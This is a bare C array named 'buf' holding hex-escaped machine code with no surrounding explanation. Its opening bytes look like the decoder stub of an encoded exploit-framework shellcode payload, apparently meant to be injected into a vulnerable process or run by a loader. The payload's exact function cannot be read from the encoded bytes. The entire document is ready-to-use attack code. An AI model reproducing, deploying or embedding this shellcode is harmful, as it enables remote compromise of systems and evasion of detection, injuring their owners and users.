unsigned char buf[] = 
"\xdb\xce\xd9\x74\x24\xf4\xbe\xa1\xa1\xa2\x9f\x5a\x2b\xc9"
"\xb1\x79\x83\xc2\x04\x31\x72\x16\x03\x72\x16\xe2\x54\x1c"
"\x91\xb5\x11\x57\x0c\x10\xc4\x1c\x94\x57\xac\xef\x1d\x26"
"\x23\x21\xf4\x5b\x40\xab\xf4\x5f\x1f\x08\x60\x9d\xd9\xb1"
"\xda\xd7\xb9\xd7\xe3\x1a\x38\xa7\x20\x72\x08\xde\x33\xba"
"\x5b\x85\x43\x4c\xc9\x26\x3e\xfd\x0c\x25\x8e\xc0\x95\xb1"
"\x19\xeb\x17\x6a\x7b\xb3\x96\xdb\x5a\x54\xd9\xb9\x91\x05"
"\x78\x1b\xfd\xa8\x63\x44\x4f\x99\xcf\xcb\xca\x6e\xe4\xd4"
"\x14\x6a\xa4\x03\x86\x53\x75\x8d\x0b\x0b\x6c\x84\x35\xfd"
"\xfa\xe3\x02\xf2\x9d\xb7\x16\xea\x78\x56\xd5\xd8\x79\x9b"
"\xa9\xa7\x60\x4e\x7a\x37\x9d\x01\xdf\x93\xe8\x36\xa8\x2f"
"\x50\x37\x60\x90\x9f\xbb\xdc\x09\x77\xd3\x12\xa4\xca\x7d"
"\xc5\x37\xd2\xaa\x78\x3b\x54\x89\xf5\xd1\x35\x03\x4c\xb2"
"\x22\xbf\x58\x6f\xf4\xec\x5b\x49\xd5\xab\x25\x62\xae\x64"
"\x97\x83\xbd\xd5\xe4\x8e\x61\xa7\xd7\xd2\x3e\x72\x8f\x74"
"\x3e\x09\x90\x5a\x2a\x3c\xf5\x78\xf8\x76\xa5\xfe\x66\x12"
"\xd5\x8d\x97\xbd\xb0\x01\x53\x91\xef\x09\xba\x09\xf2\x50"
"\xe1\x2f\x57\x8e\x58\x5d\x54\x1a\x1b\xc4\xb6\x69\x88\x74"
"\x4a\x1d\x6b\x55\xac\x10\xee\x9c\xc9\xaa\x0c\xe2\x2d\xd4"
"\xce\x8d\x40\x6e\x1b\x9a\xcd\x25\x54\x98\xce\xee\xd6\xaf"
"\x2a\xd6\xe1\x9d\x6c\x74\x79\x15\x72\x96\x96\x24\x64\x6a"
"\xfb\x44\x71\x80\xab\xfd\x63\xe3\xe1\xb6\x35\x9f\x88\x36"
"\x1c\x73\x26\x13\x2a\xbd\x36\xd9\xbd\x4e\x5e\x37\x45\x8d"
"\x91\xa0\xd4\xc5\x14\x59\xe8\x31\xea\x2e\x5e\x20\x26\xca"
"\x73\x3d\xb3\x6b\x24\xf2\x74\xf6\xc2\x4d\x6b\x9a\xe7\x91"
"\x1a\x6b\x3a\x3e\xd0\x21\x27\x0e\x81\x10\xe3\x4f\x41\x38"
"\x4b\x7c\x1f\xd0\xea\x49\x7d\x94\x86\x1f\xf4\xfa\xfc\x2b"
"\x36\x57\x8d\xc7\x8c\x03\x93\xdb\xaf\x7d\xcf\x8b\x12\xb4"
"\x80\x46\x6d\x83\x68\x6c\x81\x9e\x55\x9c\x1c\xaf\xc0\x28"
"\x3b\x95\x4a\xc9\x59\xc0\x97\xad\x58\xe1\xaf\x75\x66\xfd"
"\x5f\x28\xee\xbb\x75\x3b\x73\x2e\xee\x01\xc7\x6d\x08\x95"
"\xe7\xfa\x12\xd3\x43\xff\x8c\x02\xad\xa4\x17\x18\xba\x7b"
"\x94\x6b\x35\x05\x1f\x14\xbe\x7a\x75\xd3\x93\x5c\x93\xa0"
"\x3b\x60\x92\x86\x47\x83\x60\x87\xe9\x54\x5a\x74\x4f\x2f"
"\x99\xf9\x04\xe3\x1c\xbb\x54\xb3\x45\x21\x0b\x5e\x62\xf9"
"\x62\x5a\x14\x39\x25\x37\xde\x83\x1e\x71\xd9\x4e\x8a\x41"
"\x03\x6a\xb9\xa0\xef\x49";
